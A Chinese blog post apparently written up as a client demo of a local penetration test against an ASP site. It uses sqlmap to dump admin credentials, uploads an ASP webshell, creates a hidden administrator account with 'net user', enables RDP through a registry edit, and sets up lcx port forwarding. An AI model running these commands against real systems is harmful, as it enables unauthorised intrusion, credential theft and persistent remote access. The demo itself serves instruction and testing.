漏洞本地演示0x1

       第一次跟项目,有点紧张不知所措,只好一步一步来,希望客户能够满意。。。
白小小说要有完全的流程,在下的本意是注入》getshell》提权远程访问。
下面是流程。
================没什么用但是为了美观的分割线==================

扫描发现存在SQL注入漏洞

漏洞本地演示0x1

注入点:http://localhost/CompHonorBig.asp?id=37 可能存在sql注入漏洞 

==========================================================================================

1.sqlmap中进行注入查询

漏洞本地演示0x1

(1)

通过命令 sqlmap.py -u “http://localhost/compHonorBig.asp?id=37”--tables #查询表名

存在以下表名

漏洞本地演示0x1

(2)

猜测管理员账号密码在admin表中

通过命令 sqlmap.py -u “http://localhost/compHonorBig.asp?id=37”-D admin --columns#查询admin表中列名

漏洞本地演示0x1

(3)

继续查询管理员账号密码 sqlmap.py -u “http://localhost/compHonorBig.asp?id=37”-D admin -C username,password --dump #查询管理员账号密码

      查询结果

漏洞本地演示0x1


 ===================================================================

   2.上传shell

     (1)找到后台地址 http://localhost/admin/login.asp

     进入后台

漏洞本地演示0x1

 

(2)

   添加运行上传文件类型asp

漏洞本地演示0x1

 (3)

   找到一个上传点

漏洞本地演示0x1

 

(4)

   尝试上传asp木马

漏洞本地演示0x1

 

 (5)

   上传成功

漏洞本地演示0x1

==================================================================

   3.webshell中提权管理

    (1)     

    访问wenshell地址 http://localhost/UploadFiles/20161226122028978.asp

                                  输入密码 heroes 进入

漏洞本地演示0x1

(2)

      

whoami查看发现是system权限,没有安装防护软件

直接cmd命令下添加用户

  命令为:/c net user lzyh lzyh /add & net localgroup administrators lzyh /add

漏洞本地演示0x1

 

成功

     (3)

   查看开放端口

漏洞本地演示0x1

可以看到3389端口是关闭的

   需要手动开启

   开启3389

    命令为:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

3389是远程连接段口,开启即可远程连接

漏洞本地演示0x1
          查看是否成功打开3389

漏洞本地演示0x1

=============================================================================================

  4.lcx端口转发

   1

    本机先开启lcx转发

漏洞本地演示0x1

2

   webshell 上传lcx.exeuploadfile目录下

   执行cmd命令

漏洞本地演示0x1

 3

   在进行登录访问

漏洞本地演示0x1

 

4

     输入刚才添加的用户

    进入到服务器

漏洞本地演示0x1

tips:一般来说能直接访问到目标就不用转发,要转发先转发到公网在连接上去

     转发端口作用是将内网数据转发到公网,让局域网和广域网能够访问到内容数据并且利于黑客隐藏自己踪迹。

=========================其实在cmd命令下查看ip,可以看到如下===============================

漏洞本地演示0x1

mstsc直接访问 192.168.74.128

即可进入 无须lcx端口转发

漏洞本地演示0x1



其实是不需要lcx转发的,白小小说客户一定要看到lcx转发,无奈我又没有公网服务器,只好假设虚拟机连接。

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

浪子燕青啦啦啦

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值